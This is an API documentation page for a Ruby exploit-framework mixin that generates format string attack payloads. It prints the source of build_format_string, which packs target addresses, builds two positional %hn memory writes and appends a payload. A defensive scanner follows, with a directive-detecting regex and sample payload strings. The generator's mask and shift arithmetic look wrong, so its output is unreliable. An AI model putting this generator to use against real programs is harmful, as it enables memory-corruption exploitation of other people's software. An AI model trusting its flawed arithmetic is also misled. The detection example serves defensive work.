Module: Ronin::Exploits::Mixins::FormatString

Includes:
Binary
Defined in:
lib/ronin/exploits/mixins/format_string.rb

Overview

Adds methods to exploits for generating format strings to be used in format string vulnerabilities.

Since:

  • 1.0.0

API:

  • public

Instance Method Summary

  • #build_format_string(overwrite:, pop_length:, address:, payload:) ⇒ String
    Builds a format string.

Methods included from Binary

#pack, #perform_validate, #platform

Instance Method Details

#build_format_string(overwrite:, pop_length:, address:, payload:) ⇒ String

Builds a format string that writes the given address to the given overwrite address in two `%hn` halves, with the payload appended after the directives.

Parameters:

  • overwrite: The address to overwrite.

  • pop_length: The stack position of the overwrite address, used as the positional argument index in the `%N$hn` directives.

  • address: The address to write.

  • payload: The payload to append to the format string.

Returns:

  • The built format string.

Since:

  • 1.0.0

API:

  • public



# File 'lib/ronin/exploits/mixins/format_string.rb', line 55

def build_format_string(overwrite: , pop_length: , address: , payload: )
  # native word type of the target platform (from the Binary mixin);
  # its #size is the word width in bytes
  machine_word = platform[:machine_word]

  # the buffer opens with the two target addresses, packed in the
  # platform's byte order: the overwrite address and the address half a
  # word above it
  buffer = String.new(encoding: Encoding::ASCII_8BIT)
  buffer << pack(:machine_word,overwrite)
  buffer << pack(:machine_word,overwrite + (machine_word.size / 2))

  # bit masks used to split the value being written into a low and a high part
  low_mask = 0xff

  (machine_word.size / 2).times do
    low_mask <<= 8
    low_mask  |= 0xff
  end

  high_mask = low_mask << ((machine_word.size * 8) / 2)

  high = (address & high_mask) >> (machine_word.size / 2)
  low  = address & low_mask

  # %hn stores the number of characters printed so far, so the smaller half
  # is emitted first and the second directive only pads up to the larger
  # half; the first count is reduced by the bytes already in the buffer
  if low < high
    low    -= (machine_word.size * 2)
    buffer << format("%%.%ud%%%u$hn%%.%ud%%%u$hn",low,pop_length,high - low,pop_length + 1)
  else
    high   -= (machine_word.size * 2)
    buffer << format("%%.%ud%%%u$hn%%.%ud%%%u$hn",high,pop_length + 1,low - high,pop_length)
  end

  # the caller's payload follows the directives
  buffer << payload.to_s
  return buffer
end
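For the defensive side of the same directive syntax, here is an added example that is not part of ronin-exploits: a small Ruby scanner that parses printf-style conversion directives out of untrusted input and reports the ones a format string bug would act on, the `%n` family (which writes a character count into memory) and positional `%N$` arguments (which select a stack slot), so a log filter, fuzzing harness or input validator can reject data that must never reach printf() as the format argument. The directive grammar, the `Finding` struct, the function names and the sample inputs are all constructed for this example.

```ruby
# Added example (not ronin-exploits code): detect printf-style directives in
# untrusted input. A string that is only ever passed as printf()'s format
# argument from a constant has no reason to contain any live directive.

# Simplified printf directive grammar:
#   % [argnum$] [flags] [width] [.precision] [length] conversion
DIRECTIVE = /%(?:(\d+)\$)?([-+ #0]*)(\d+|\*)?(?:\.(\d+|\*))?(hh|h|ll|l|j|z|t|L)?([diouxXeEfFgGaAcspn%])/

# One directive found in the input.
#   kind is :write for the %n family (it stores a count into memory) and
#   :read for every other conversion (it consumes a stack slot or pointer).
Finding = Struct.new(:text, :offset, :kind, :argnum, :precision)

# Returns one Finding per directive in +input+; "%%" is a literal percent
# sign and is not reported.
def scan_format_directives(input)
  findings = []
  input.scan(DIRECTIVE) do
    m = Regexp.last_match
    argnum, _flags, _width, precision, _length, conv = m.captures
    next if conv == '%'
    kind = (conv == 'n') ? :write : :read
    findings << Finding.new(m[0], m.begin(0), kind,
                            argnum && argnum.to_i,
                            precision && precision.to_i)
  end
  findings
end

# True when the input contains any live directive at all.
def format_string_payload?(input)
  !scan_format_directives(input).empty?
end

# Summarises what the directives would do if the input were used as a format:
# how many stack reads, how many memory writes, how many directives pick
# their argument by position, and the largest precision (a large ".N"
# precision is how a %hn write gets its value up to the wanted count).
def summarize(input)
  findings = scan_format_directives(input)
  { reads:         findings.count { |f| f.kind == :read },
    writes:        findings.count { |f| f.kind == :write },
    positional:    findings.count { |f| f.argnum },
    max_precision: findings.map(&:precision).compact.max }
end

# Constructed sample inputs, not real captures.
SAMPLES = {
  benign: "progress: 100%% complete",        # escaped percent only
  leak:   "%x %x %x %x",                     # stack reads, no writes
  write:  "AAAA%.1234d%7$hn%.5678d%8$hn",    # the shape the mixin above emits
}

if __FILE__ == $0
  SAMPLES.each do |name, input|
    puts "#{name}: payload=#{format_string_payload?(input)} #{summarize(input).inspect}"
  end
end
```

`scan_format_directives` follows the printf grammar rather than just searching for `%n`, so `%7$hn` is reported with its length modifier and argument number intact and `%%` is not a false positive; the `summarize` counts are what a detection rule would key on (any write, or any positional argument, in data that is supposed to be plain text).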